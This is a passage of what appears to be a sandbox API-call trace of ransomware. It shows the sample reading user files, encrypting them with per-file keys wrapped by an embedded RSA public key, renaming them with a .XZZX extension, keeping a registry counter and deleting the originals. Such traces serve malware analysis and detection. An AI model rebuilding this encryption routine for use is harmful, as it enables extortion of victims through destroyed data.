hFile=0x510, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x14, lpOverlapped=0x0) returned 1 [0044.538] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x74ff [0044.538] WriteFile (in: hFile=0x510, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.538] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7504 [0044.538] SetErrorMode (uMode=0x1) returned 0x1 [0044.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0044.538] OutputDebugStringW (lpOutputString="end") [0044.539] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0044.539] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0044.539] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5428) returned 1 [0044.540] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5428, dwCertEncodingType=0x1, pInfo=0x3e3fd80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3fdb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3fdb8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5c90) returned 1 [0044.540] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.540] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0044.540] CryptEncrypt (in: hKey=0x42e5c90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0044.540] CryptEncrypt (in: hKey=0x42e5c90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d54b0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d54b0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0044.540] WriteFile (in: hFile=0x510, lpBuffer=0x42d54b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d54b0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0044.540] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0044.540] WriteFile (in: hFile=0x510, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.541] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0044.541] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0044.541] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x51c) returned 0x0 [0044.541] RegQueryValueExW (in: hKey=0x51c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x3a, lpcbData=0x417dfdc*=0x4) returned 0x0 [0044.541] RegCloseKey (hKey=0x51c) returned 0x0 [0044.541] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x51c) returned 0x0 [0044.541] RegSetValueExW (in: hKey=0x51c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x3b, cbData=0x4 | out: lpData=0x417dfec*=0x3b) returned 0x0 [0044.541] RegCloseKey (hKey=0x51c) returned 0x0 [0044.541] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.542] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.542] CloseHandle (hObject=0x510) returned 1 [0044.543] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0044.544] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0044.544] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico")) returned 1 [0044.544] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico")) returned 0 Thread: id = 154 os_tid = 0x94c [0044.574] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.574] lstrcpyW (in: lpString1=0x417f460, lpString2="voeimd@djhreuu.uhd.pst" | out: lpString1="voeimd@djhreuu.uhd.pst") returned="voeimd@djhreuu.uhd.pst" [0044.574] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0044.574] SetErrorMode (uMode=0x1) returned 0x1 [0044.574] lstrcpyW (in: lpString1=0x417f860, lpString2="voeimd@djhreuu.uhd.pst" | out: lpString1="voeimd@djhreuu.uhd.pst") returned="voeimd@djhreuu.uhd.pst" [0044.574] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xf297b12, Data2=0xda68, Data3=0x48f8, Data4=([0]=0x9f, [1]=0x6, [2]=0xc, [3]=0xba, [4]=0x73, [5]=0x27, [6]=0xef, [7]=0x61))) returned 0x0 [0044.574] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0044.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0044.575] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\7BA753503E40D4C00F297B124258B908.XZZX") returned 95 [0044.575] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="XZZX") returned 0x0 [0044.575] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", dwFileAttributes=0x20) returned 1 [0044.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0044.577] ReadFile (in: hFile=0x51c, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x42400, lpOverlapped=0x0) returned 1 [0044.580] CloseHandle (hObject=0x51c) returned 1 [0044.580] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0044.585] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0044.585] SetErrorMode (uMode=0x1) returned 0x1 [0044.585] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0044.585] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5538) returned 1 [0044.588] CryptGenKey (in: hProv=0x42d5538, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e53d0) returned 1 [0044.737] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.737] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.737] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.737] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0044.738] CryptDestroyKey (hKey=0x42e53d0) returned 1 [0044.738] CryptReleaseContext (hProv=0x42d5538, dwFlags=0x0) returned 1 [0044.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\7BA753503E40D4C00F297B124258B908.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\7ba753503e40d4c00f297b124258b908.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0044.740] WriteFile (in: hFile=0x51c, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x42400, lpOverlapped=0x0) returned 1 [0044.745] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42400 [0044.745] WriteFile (in: hFile=0x51c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.745] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42405 [0044.745] WriteFile (in: hFile=0x51c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2c, lpOverlapped=0x0) returned 1 [0044.745] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42431 [0044.745] WriteFile (in: hFile=0x51c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.746] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42436 [0044.746] SetErrorMode (uMode=0x1) returned 0x1 [0044.746] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0044.746] OutputDebugStringW (lpOutputString="end") [0044.746] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0044.746] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0044.746] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5538) returned 1 [0044.746] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5538, dwCertEncodingType=0x1, pInfo=0x3e3fe50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3fe80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3fe88*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5c50) returned 1 [0044.746] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.747] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0044.747] CryptEncrypt (in: hKey=0x42e5c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0044.747] CryptEncrypt (in: hKey=0x42e5c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d55c0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d55c0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0044.747] WriteFile (in: hFile=0x51c, lpBuffer=0x42d55c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d55c0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0044.747] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0044.747] WriteFile (in: hFile=0x51c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.747] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0044.747] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0044.747] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x528) returned 0x0 [0044.748] RegQueryValueExW (in: hKey=0x528, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x3b, lpcbData=0x417dfdc*=0x4) returned 0x0 [0044.748] RegCloseKey (hKey=0x528) returned 0x0 [0044.748] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x528) returned 0x0 [0044.748] RegSetValueExW (in: hKey=0x528, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x3c, cbData=0x4 | out: lpData=0x417dfec*=0x3c) returned 0x0 [0044.748] RegCloseKey (hKey=0x528) returned 0x0 [0044.748] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.748] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0044.748] CloseHandle (hObject=0x51c) returned 1 [0044.751] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0044.752] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0044.752] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 1 [0044.767] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 0 Thread: id = 155 os_tid = 0x954 [0044.771] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.771] lstrcpyW (in: lpString1=0x417f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.771] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0044.771] SetErrorMode (uMode=0x1) returned 0x1 [0044.771] lstrcpyW (in: lpString1=0x417f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.771] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xea018e65, Data2=0xffec, Data3=0x4f43, Data4=([0]=0x9c, [1]=0xab, [2]=0xc9, [3]=0x56, [4]=0xf0, [5]=0xf6, [6]=0xb6, [7]=0xb0))) returned 0x0 [0044.771] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0044.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0044.771] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned 81 [0044.771] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0044.771] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", dwFileAttributes=0x20) returned 1 [0044.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528 [0044.772] ReadFile (in: hFile=0x528, lpBuffer=0x343ed8, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x343ed8*, lpNumberOfBytesRead=0x417e418*=0x11a, lpOverlapped=0x0) returned 1 [0044.772] CloseHandle (hObject=0x528) returned 1 [0044.772] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0044.772] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0044.773] SetErrorMode (uMode=0x1) returned 0x1 [0044.773] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0044.773] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5648) returned 1 [0044.775] CryptGenKey (in: hProv=0x42d5648, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e4f90) returned 1 [0044.899] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.899] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.899] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.900] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0044.900] CryptDestroyKey (hKey=0x42e4f90) returned 1 [0044.900] CryptReleaseContext (hProv=0x42d5648, dwFlags=0x0) returned 1 [0044.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\4645E01C4F3CCEC4EA018E655354B30C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\4645e01c4f3ccec4ea018e655354b30c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528 [0044.900] WriteFile (in: hFile=0x528, lpBuffer=0x343ed8*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x343ed8*, lpNumberOfBytesWritten=0x417e438*=0x11a, lpOverlapped=0x0) returned 1 [0044.901] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a [0044.901] WriteFile (in: hFile=0x528, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.901] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: 